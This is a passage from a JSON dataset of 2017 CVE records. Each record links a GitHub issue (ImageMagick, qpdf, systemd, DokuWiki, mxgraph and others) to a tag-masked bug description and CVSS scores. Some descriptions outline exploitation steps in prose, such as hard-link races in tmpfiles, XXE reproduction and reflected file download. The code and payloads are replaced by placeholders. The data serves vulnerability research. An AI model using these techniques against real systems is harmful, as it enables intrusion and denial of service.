  11435. "description": "NULL Pointer Dereference while extracting metadata of a malformed tiff. There's a NULL Pointer Dereference occurring during the metadata extraction from a malformed tiff file. This can be triggered by running APITAG on the test case, FILETAG . The hexdump of the test case is: CODETAG The relevant ASAN output is: ERRORTAG It looks like the NULL Pointer Dereference is being triggered by a NUMBERTAG alue which is being used in the APITAG function in the value of n , which is being dereferenced in APITAG This is indicated by the GDB backtrace: CODETAG Debug info: Exi NUMBERTAG ersion NUMBERTAG a NUMBERTAG bit build) Compiler: gcc NUMBERTAG clang NUMBERTAG OS: Ubuntu NUMBERTAG",
  11436. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11437. "severity": "MEDIUM",
  11438. "baseScore": 5.5,
  11439. "impactScore": 3.6,
  11440. "exploitabilityScore": 1.8
  11441. },
  11442. {
  11443. "CVE_ID": "CVE-2017-18008",
  11444. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/921",
  11445. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/921",
  11446. "Repo_new": "imagemagick/imagemagick",
  11447. "Issue_Created_At": "2017-12-27T01:42:51Z",
  11448. "description": "memory leaks in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib magick convert Memory Leak APITAG /dev/null ERRORTAG test case: URLTAG",
  11449. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11450. "severity": "MEDIUM",
  11451. "baseScore": 6.5,
  11452. "impactScore": 3.6,
  11453. "exploitabilityScore": 2.8
  11454. },
  11455. {
  11456. "CVE_ID": "CVE-2017-18009",
  11457. "Issue_Url_old": "https://github.com/opencv/opencv/issues/10479",
  11458. "Issue_Url_new": "https://github.com/opencv/opencv/issues/10479",
  11459. "Repo_new": "opencv/opencv",
  11460. "Issue_Created_At": "2018-01-01T03:37:50Z",
  11461. "description": "Buffer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Detailed description Detailed description A buffer overflow occurs in function APITAG in file PATHTAG The crash details as follows: ERRORTAG Steps to reproduce Please refer to the following url for the testcases: URLTAG",
  11462. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11463. "severity": "HIGH",
  11464. "baseScore": 7.5,
  11465. "impactScore": 3.6,
  11466. "exploitabilityScore": 3.9
  11467. },
  11468. {
  11469. "CVE_ID": "CVE-2017-18021",
  11470. "Issue_Url_old": "https://github.com/IJHack/QtPass/issues/338",
  11471. "Issue_Url_new": "https://github.com/ijhack/qtpass/issues/338",
  11472. "Repo_new": "ijhack/qtpass",
  11473. "Issue_Created_At": "2017-12-22T16:41:17Z",
  11474. "description": "Insecure Password Generation. The current way of generating passwords is insecure. All passwords that have been generated with APITAG in the past must be regenerated and changed. Here is the current password generation function: CODETAG The problem here is that module will not uniformly distribute that set. The proper way to do things is to just throw away values that are out of bounds. You _could_ try to do the calculation correctly to uniformly stretch or compress, but it's hard to get right, so it's best to just discard numbers outside the set and try again. Secondly, and more critically, here is the implementation of APITAG : CODETAG Unfortunately, using a non cryptographically secure random number generator like libc's APITAG is problematic future outputs can be derived from knowing only a handful of past outputs and seeding that deterministic rng with APITAG is even more dangerous. Not only is the current time a guessable/bruteforcable parameter, but the documentation for APITAG actually indicates that this is merely the \" the millisecond part NUMBERTAG to NUMBERTAG of the time URLTAG \", which means there are only NUMBERTAG possibilities of generated sequences of passwords. This is as bad as it gets, in terms of password manager key generation. The proper fix is to use Qt NUMBERTAG s APITAG URLTAG . If NUMBERTAG is not available to you, use APITAG on APITAG and APITAG on Windows URLTAG .",
  11475. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11476. "severity": "CRITICAL",
  11477. "baseScore": 9.8,
  11478. "impactScore": 5.9,
  11479. "exploitabilityScore": 3.9
  11480. },
  11481. {
  11482. "CVE_ID": "CVE-2017-18022",
  11483. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/904",
  11484. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/904",
  11485. "Repo_new": "imagemagick/imagemagick",
  11486. "Issue_Created_At": "2017-12-20T06:01:03Z",
  11487. "description": "memory leaks. system\uff1aubuntu NUMBERTAG ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage poc /dev/null montage: no decode delegate for this image format ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG ff9bd NUMBERTAG fb NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bd NUMBERTAG fb NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bc NUMBERTAG b6 in APITAG PATHTAG NUMBERTAG ff9bc7cd1c2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG ff9ba NUMBERTAG df NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG ff9bd NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bd NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bd NUMBERTAG fb NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bc NUMBERTAG b6 in APITAG PATHTAG NUMBERTAG ff9bc7cd1c2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG ff9ba NUMBERTAG df NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
  11488. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11489. "severity": "MEDIUM",
  11490. "baseScore": 6.5,
  11491. "impactScore": 3.6,
  11492. "exploitabilityScore": 2.8
  11493. },
  11494. {
  11495. "CVE_ID": "CVE-2017-18027",
  11496. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/734",
  11497. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/734",
  11498. "Repo_new": "imagemagick/imagemagick",
  11499. "Issue_Created_At": "2017-09-06T14:58:42Z",
  11500. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in coders/mat.c ,which allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  11501. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11502. "severity": "MEDIUM",
  11503. "baseScore": 6.5,
  11504. "impactScore": 3.6,
  11505. "exploitabilityScore": 2.8
  11506. },
  11507. {
  11508. "CVE_ID": "CVE-2017-18028",
  11509. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/736",
  11510. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/736",
  11511. "Repo_new": "imagemagick/imagemagick",
  11512. "Issue_Created_At": "2017-09-07T06:44:11Z",
  11513. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When convert tiff file , imagemagick will allocate memory to store the data, here is the critical code: (tiff.c , in function APITAG APITAG The \"rows\" can be got from tiff file,that is to say it can be controlled by input APITAG is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG APITAG of Venustech",
  11514. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11515. "severity": "MEDIUM",
  11516. "baseScore": 6.5,
  11517. "impactScore": 3.6,
  11518. "exploitabilityScore": 2.8
  11519. },
  11520. {
  11521. "CVE_ID": "CVE-2017-18029",
  11522. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/691",
  11523. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/691",
  11524. "Repo_new": "imagemagick/imagemagick",
  11525. "Issue_Created_At": "2017-08-22T16:03:42Z",
  11526. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in coders/mat.c ,which allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  11527. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11528. "severity": "MEDIUM",
  11529. "baseScore": 6.5,
  11530. "impactScore": 3.6,
  11531. "exploitabilityScore": 2.8
  11532. },
  11533. {
  11534. "CVE_ID": "CVE-2017-18048",
  11535. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/426",
  11536. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/426",
  11537. "Repo_new": "monstra-cms/monstra",
  11538. "Issue_Created_At": "2017-11-20T11:51:56Z",
  11539. "description": "Patch for Remote Command Execution Vulnerability. Hi MENTIONTAG Kindly blacklist extensions all uppercase or a combination of uppercase and lowercase APITAG also in FILETAG",
  11540. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  11541. "severity": "HIGH",
  11542. "baseScore": 8.8,
  11543. "impactScore": 5.9,
  11544. "exploitabilityScore": 2.8
  11545. },
  11546. {
  11547. "CVE_ID": "CVE-2017-18077",
  11548. "Issue_Url_old": "https://github.com/juliangruber/brace-expansion/issues/33",
  11549. "Issue_Url_new": "https://github.com/juliangruber/brace-expansion/issues/33",
  11550. "Repo_new": "juliangruber/brace-expansion",
  11551. "Issue_Created_At": "2017-03-02T06:35:17Z",
  11552. "description": "APITAG in expand. APITAG will cause a APITAG accept URLTAG will fix the security bug.",
  11553. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11554. "severity": "HIGH",
  11555. "baseScore": 7.5,
  11556. "impactScore": 3.6,
  11557. "exploitabilityScore": 3.9
  11558. },
  11559. {
  11560. "CVE_ID": "CVE-2017-18078",
  11561. "Issue_Url_old": "https://github.com/systemd/systemd/issues/7736",
  11562. "Issue_Url_new": "https://github.com/systemd/systemd/issues/7736",
  11563. "Repo_new": "systemd/systemd",
  11564. "Issue_Created_At": "2017-12-24T17:33:43Z",
  11565. "description": "tmpfiles: unsafe handling of hard links and a race condition. These issues only affect a vanilla kernel, so for any of this to make sense on a patched distro kernel, you'll want to disable the following: APITAG The tmpfiles.d specification for the Z type more or less implies some kind of recursive chown. The spec heads off one type of vulnerability by saying that symlinks should not be followed; however, hard links are still a problem. Consider the following: APITAG The first time that tmpfiles is run, everything is fine. But then my \"mjo\" user owns the directory in question, and I can create a hard link... APITAG and re run tmpfiles... APITAG to take ownership of APITAG : APITAG Now, I said that everything was fine the first time that tmpfiles was run, but I lied. The recursive chown moves from the top down, meaning that APITAG is chowned after APITAG . There is a race condition there that can be exploited. In another terminal, you can run, APITAG and if you're lucky, the hard link will get created after you own the APITAG directory, but before chown is called on x . This particular race condition isn't unique to the Z type. For another example, consider, APITAG Here, the same thing happens, and the \"mjo\" user has some time to replace foo with a hard link.",
  11566. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  11567. "severity": "HIGH",
  11568. "baseScore": 7.8,
  11569. "impactScore": 5.9,
  11570. "exploitabilityScore": 1.8
  11571. },
  11572. {
  11573. "CVE_ID": "CVE-2017-18120",
  11574. "Issue_Url_old": "https://github.com/kohler/gifsicle/issues/117",
  11575. "Issue_Url_new": "https://github.com/kohler/gifsicle/issues/117",
  11576. "Repo_new": "kohler/gifsicle",
  11577. "Issue_Created_At": "2017-10-16T13:21:05Z",
  11578. "description": "denial of service attack. Hi, I received two report bugs that may allow a denial of service attack. Maybe one has already been fixed NUMBERTAG CVETAG But this one is new I guess. CVETAG Regards, Herbert",
  11579. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11580. "severity": "HIGH",
  11581. "baseScore": 7.8,
  11582. "impactScore": 5.9,
  11583. "exploitabilityScore": 1.8
  11584. },
  11585. {
  11586. "CVE_ID": "CVE-2017-18123",
  11587. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2029",
  11588. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2029",
  11589. "Repo_new": "dokuwiki/dokuwiki",
  11590. "Issue_Created_At": "2017-06-27T12:49:21Z",
  11591. "description": "reflected file download vulnerability. originally reported in URLTAG Description The APITAG parameter on APITAG does not properly encode user input, which leads to the reflected file download vulnerability. Example: APITAG The server responds with: ERRORTAG . Impact This can lead to arbitrary code execution on a victim's machine! Reproduction on Windows NUMBERTAG Open Chrome Browser NUMBERTAG isit redacted contained a link with a download attribute NUMBERTAG Right click the Download link and click Save Link As and then save NUMBERTAG APITAG should then download, which contains the attacker's shellcode, downloaded from APITAG If the user runs this batch file in Windows, it will open your calculator! This could lead to the entire compromise of the victim's computer. Patch I recommend URL encoding any characters in the server response (if the ajax call is not found) such as APITAG and APITAG and APITAG References URLTAG URLTAG URLTAG",
  11592. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  11593. "severity": "HIGH",
  11594. "baseScore": 8.6,
  11595. "impactScore": 6.0,
  11596. "exploitabilityScore": 1.8
  11597. },
  11598. {
  11599. "CVE_ID": "CVE-2017-18183",
  11600. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/143",
  11601. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/143",
  11602. "Repo_new": "qpdf/qpdf",
  11603. "Issue_Created_At": "2017-08-12T07:51:55Z",
  11604. "description": "stack overflow / crash on malformed input in APITAG The attached file will crash qpdf. It seems it's running into an endless recursion and thus a stack overflow. Found with afl. FILETAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffda4d NUMBERTAG f NUMBERTAG pc NUMBERTAG ba NUMBERTAG bp NUMBERTAG ffda4d NUMBERTAG c0 sp NUMBERTAG ffda4d NUMBERTAG f NUMBERTAG T NUMBERTAG ba NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG c NUMBERTAG in APITAG ) PATHTAG NUMBERTAG c NUMBERTAG in APITAG , int, int) PATHTAG NUMBERTAG c NUMBERTAG in APITAG , int, int) PATHTAG NUMBERTAG b NUMBERTAG af in APITAG , int, int) PATHTAG NUMBERTAG b NUMBERTAG af in APITAG int) PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG",
  11605. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11606. "severity": "MEDIUM",
  11607. "baseScore": 5.5,
  11608. "impactScore": 3.6,
  11609. "exploitabilityScore": 1.8
  11610. },
  11611. {
  11612. "CVE_ID": "CVE-2017-18184",
  11613. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/147",
  11614. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/147",
  11615. "Repo_new": "qpdf/qpdf",
  11616. "Issue_Created_At": "2017-08-23T09:37:44Z",
  11617. "description": "stack out of bounds read in function iterate_rc4. The attached file will cause an out of bounds read in qpdf, detectable with address sanitizer. FILETAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffee NUMBERTAG f NUMBERTAG at pc NUMBERTAG ee NUMBERTAG bp NUMBERTAG ffee NUMBERTAG f NUMBERTAG sp NUMBERTAG ffee NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffee NUMBERTAG f NUMBERTAG thread T NUMBERTAG ee NUMBERTAG in iterate_rc4(unsigned char , int, unsigned char , int, int, bool) PATHTAG NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG >&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG const&) PATHTAG NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG >&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG const&) PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e6c in QPDF::parse(char const ) PATHTAG NUMBERTAG e1a in APITAG const , char const ) PATHTAG NUMBERTAG d in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG f NUMBERTAG f0 in __libc_start_main APITAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffee NUMBERTAG f NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG cf in APITAG PATHTAG This frame has NUMBERTAG object(s NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG <== Memory access at offset NUMBERTAG overflows this variable NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG id NUMBERTAG id_obj NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG encryption_dict NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG [ ERRORTAG NUMBERTAG APITAG NUMBERTAG O NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG U NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG OE NUMBERTAG UE NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG CF NUMBERTAG APITAG NUMBERTAG keys NUMBERTAG cdict NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG method_name NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG EFF NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG data NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG perms_valid NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG",
  11618. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11619. "severity": "MEDIUM",
  11620. "baseScore": 5.5,
  11621. "impactScore": 3.6,
  11622. "exploitabilityScore": 1.8
  11623. },
  11624. {
  11625. "CVE_ID": "CVE-2017-18185",
  11626. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/150",
  11627. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/150",
  11628. "Repo_new": "qpdf/qpdf",
  11629. "Issue_Created_At": "2017-08-27T15:25:54Z",
  11630. "description": "heap out of bounds read (large) in APITAG The attached file causes an out of bounds heap read, detectable with asan, found with libfuzzer. FILETAG ASAN error NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG bcf NUMBERTAG bp NUMBERTAG ffe NUMBERTAG cea NUMBERTAG sp NUMBERTAG ffe NUMBERTAG ce1e0 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG bcf NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG c4 in APITAG char , unsigned long) PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG ddf in APITAG PATHTAG NUMBERTAG ddf in APITAG char , unsigned long) PATHTAG NUMBERTAG in APITAG char , int, int) PATHTAG NUMBERTAG e6c in APITAG char , unsigned long) PATHTAG NUMBERTAG e NUMBERTAG b0 in APITAG int, long long, unsigned long, APITAG Pipeline , bool) PATHTAG NUMBERTAG e in APITAG , int, int, long long, unsigned long, APITAG Pipeline , bool) PATHTAG NUMBERTAG e in APITAG , unsigned long, qpdf_stream_decode_level_e, bool) PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG ed6 in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG long, APITAG PATHTAG NUMBERTAG c in APITAG long) PATHTAG NUMBERTAG f NUMBERTAG in QPDF::read_xref(long long) PATHTAG NUMBERTAG e3f in QPDF::parse(char const ) PATHTAG NUMBERTAG e1a in APITAG const , char const ) PATHTAG NUMBERTAG d in main PATHTAG NUMBERTAG f8d7e6e NUMBERTAG f0 in __libc_start_main APITAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG c NUMBERTAG in operator APITAG long) ( PATHTAG NUMBERTAG e3 in APITAG const , Pipeline , APITAG unsigned int, unsigned int) PATHTAG",
  11631. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11632. "severity": "MEDIUM",
  11633. "baseScore": 5.5,
  11634. "impactScore": 3.6,
  11635. "exploitabilityScore": 1.8
  11636. },
  11637. {
  11638. "CVE_ID": "CVE-2017-18186",
  11639. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/149",
  11640. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/149",
  11641. "Repo_new": "qpdf/qpdf",
  11642. "Issue_Created_At": "2017-08-24T09:59:52Z",
  11643. "description": "xref loop causes qpdf to hang. The attached file will cause an infinite loop in qpdf due to looping xref's. FILETAG This is actually an example from a six year old bug in evince, discovered by andreas bogk, see: CVETAG URLTAG",
  11644. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11645. "severity": "MEDIUM",
  11646. "baseScore": 5.5,
  11647. "impactScore": 3.6,
  11648. "exploitabilityScore": 1.8
  11649. },
  11650. {
  11651. "CVE_ID": "CVE-2017-18188",
  11652. "Issue_Url_old": "https://github.com/OpenRC/opentmpfiles/issues/3",
  11653. "Issue_Url_new": "https://github.com/openrc/opentmpfiles/issues/3",
  11654. "Repo_new": "openrc/opentmpfiles",
  11655. "Issue_Created_At": "2017-12-24T14:52:54Z",
  11656. "description": "Unsafe use of recursive chown in \"Z\" support. The tmpfiles.d specification for the Z type more or less implies some kind of recursive chown. The spec heads off one type of vulnerability by saying that symlinks should not be followed; however, hard links are still a problem. Consider the following: CODETAG The first time that opentmpfiles setup is launched, everything is fine. But then my \"mjo\" user owns the directory in question, and I can create a hard link... APITAG and restart opentmpfiles setup... ERRORTAG and now I own APITAG ! APITAG This happens, ultimately, because APITAG will \"follow\" a hard link. This same problem was addressed in APITAG checkpath helper in Gentoo bug NUMBERTAG CVETAG .",
  11657. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  11658. "severity": "MEDIUM",
  11659. "baseScore": 5.5,
  11660. "impactScore": 3.6,
  11661. "exploitabilityScore": 1.8
  11662. },
  11663. {
  11664. "CVE_ID": "CVE-2017-18197",
  11665. "Issue_Url_old": "https://github.com/jgraph/mxgraph/issues/124",
  11666. "Issue_Url_new": "https://github.com/jgraph/mxgraph/issues/124",
  11667. "Repo_new": "jgraph/mxgraph",
  11668. "Issue_Created_At": "2017-11-22T04:31:44Z",
  11669. "description": "APITAG vulnerable to XXE attack. APITAG instance in APITAG is missing flags to prevent external entity and doctype declaration, making it vulnerable to XXE attacks. At minimum set the flags used in APITAG example. Setting \" URLTAG \" to false would additionally prevent loading of external DTD. Below are steps to reproduce. It'll need external DTD to actually extract anything but from the stack trace is sufficient to show the class is vulnerable to XXE NUMBERTAG Set up and run the Java example NUMBERTAG POST to APITAG with the following payload xml= APITAG APITAG APITAG ]> APITAG APITAG APITAG NUMBERTAG e NUMBERTAG b APITAG APITAG APITAG NUMBERTAG e; APITAG APITAG NUMBERTAG Make a GET request to URLTAG NUMBERTAG erify it's trying to read an non existent \"/blah\" file",
  11670. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11671. "severity": "CRITICAL",
  11672. "baseScore": 9.8,
  11673. "impactScore": 5.9,
  11674. "exploitabilityScore": 3.9
  11675. },
  11676. {
  11677. "CVE_ID": "CVE-2017-18209",
  11678. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/790",
  11679. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/790",
  11680. "Repo_new": "imagemagick/imagemagick",
  11681. "Issue_Created_At": "2017-09-30T07:04:44Z",
  11682. "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG APITAG APITAG may return NULL, so the following operations on the \"temp\" will dereference null pointer to cause memory error.",
  11683. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11684. "severity": "HIGH",
  11685. "baseScore": 8.8,
  11686. "impactScore": 5.9,
  11687. "exploitabilityScore": 2.8
  11688. },
  11689. {
  11690. "CVE_ID": "CVE-2017-18210",
  11691. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/791",
  11692. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/791",
  11693. "Repo_new": "imagemagick/imagemagick",
  11694. "Issue_Created_At": "2017-09-30T07:06:03Z",
  11695. "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG CODETAG APITAG may return NULL, so the following operations on the APITAG will dereference null pointer to cause memory error.",
  11696. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11697. "severity": "CRITICAL",
  11698. "baseScore": 9.8,
  11699. "impactScore": 5.9,
  11700. "exploitabilityScore": 3.9
  11701. },
  11702. {
  11703. "CVE_ID": "CVE-2017-18211",
  11704. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/792",
  11705. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/792",
  11706. "Repo_new": "imagemagick/imagemagick",
  11707. "Issue_Created_At": "2017-09-30T07:07:14Z",
  11708. "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG ERRORTAG APITAG may return NULL, so the following operations on the APITAG will dereference null pointer to cause memory error.",
  11709. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11710. "severity": "CRITICAL",
  11711. "baseScore": 9.8,
  11712. "impactScore": 5.9,
  11713. "exploitabilityScore": 3.9
  11714. },
  11715. {
  11716. "CVE_ID": "CVE-2017-18212",
  11717. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2140",
  11718. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2140",
  11719. "Repo_new": "jerryscript-project/jerryscript",
  11720. "Issue_Created_At": "2017-12-07T06:24:06Z",
